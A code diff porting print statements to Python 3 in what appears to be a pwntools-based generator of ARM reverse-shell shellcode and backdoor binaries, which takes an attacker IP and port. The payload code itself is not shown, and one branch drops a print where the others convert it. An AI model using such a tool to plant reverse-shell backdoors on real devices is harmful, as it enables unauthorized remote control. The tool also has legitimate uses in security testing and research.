@@ -29,7 +29,7 @@ def armelv7_backdoor(reverse_ip,reverse_port,filename=None):
 		f.write(data)
 		f.close()
 		#print disasm(all_reverseshell)
-		print "backdoor_armelv7 is ok in current path ./"
+		print("backdoor_armelv7 is ok in current path ./")
 
 def armelv7_reverse_sl(reverse_ip,reverse_port):
 	context.arch='arm'
@@ -128,11 +128,11 @@ def armelv7_reverse_sl(reverse_ip,reverse_port):
 		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
 		#print shellcode.index("\x00")
 		log.info("the null byte in %d"%(shellcode.index("\x00")))
-		print shellcode_hex
+		print(shellcode_hex)
 		return shellcode
 	else:
 		log.success("No NULL byte shellcode for hex(len is {}):".format(shellcode_len))
-		print shellcode_hex
+		
 		return shellcode
 
 
@@ -153,7 +153,7 @@ def armelv5_backdoor(reverse_ip,reverse_port,filename=None):
 		f.write(data)
 		f.close()
 		#print disasm(all_reverseshell)
-		print "backdoor_armelv5 is ok in current path ./"
+		print("backdoor_armelv5 is ok in current path ./")
 
 def armelv5_reverse_sl(reverse_ip,reverse_port):
 	context.bits="32"
@@ -251,11 +251,11 @@ def armelv5_reverse_sl(reverse_ip,reverse_port):
 	if "\\x00" in shellcode_hex:
 		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
 		log.info("the null byte in %d"%(shellcode.index("\x00")))
-		print shellcode_hex
+		print(shellcode_hex)
 		return shellcode
 	else:
 		log.success("No NULL byte shellcode for hex(len is {}):".format(shellcode_len))
-		print shellcode_hex
+		print(shellcode_hex)
 		return shellcode
 
 def armebv7_reverse_sl(reverse_ip,reverse_port):
@@ -354,11 +354,11 @@ def armebv7_reverse_sl(reverse_ip,reverse_port):
 	if "\\x00" in shellcode_hex:
 		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
 		log.success("the null byte in %d"%shellcode.index("\x00"))
-		print shellcode_hex
+		print(shellcode_hex)
 		return shellcode
 	else:
 		log.success("No NULL byte shellcode for hex(len is {}):".format(shellcode_len))
-		print shellcode_hex
+		print(shellcode_hex)
 		return shellcode
 
 def armebv5_reverse_sl(reverse_ip,reverse_port):
@@ -457,11 +457,11 @@ def armebv5_reverse_sl(reverse_ip,reverse_port):
 	if "\\x00" in shellcode_hex:
 		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
 		log.info("the null byte in %d"%shellcode.index("\x00"))
-		print shellcode_hex
+		print(shellcode_hex)
 		return shellcode
 	else:
 		log.success("No NULL byte shellcode for hex(len is {}):".format(shellcode_len))
-		print shellcode_hex
+		print(shellcode_hex)
 		return shellcode
 
 def armebv7_backdoor(reverse_ip,reverse_port,filename=None):
@@ -492,7 +492,7 @@ def armebv7_backdoor(reverse_ip,reverse_port,filename=None):
 		f.write(data)
 		f.close()
 		#print disasm(all_reverseshell)
-		print "backdoor_armv7 is ok in current path ./"
+		print("backdoor_armv7 is ok in current path ./")
 
 
 def armebv5_backdoor(reverse_ip,reverse_port,filename=None):
@@ -523,4 +523,4 @@ def armebv5_backdoor(reverse_ip,reverse_port,filename=None):
 		f.write(data)
 		f.close()
 		#print disasm(all_reverseshell)
-		print "backdoor_armebv5 is ok in current path ./"
+		print("backdoor_armebv5 is ok in current path ./")
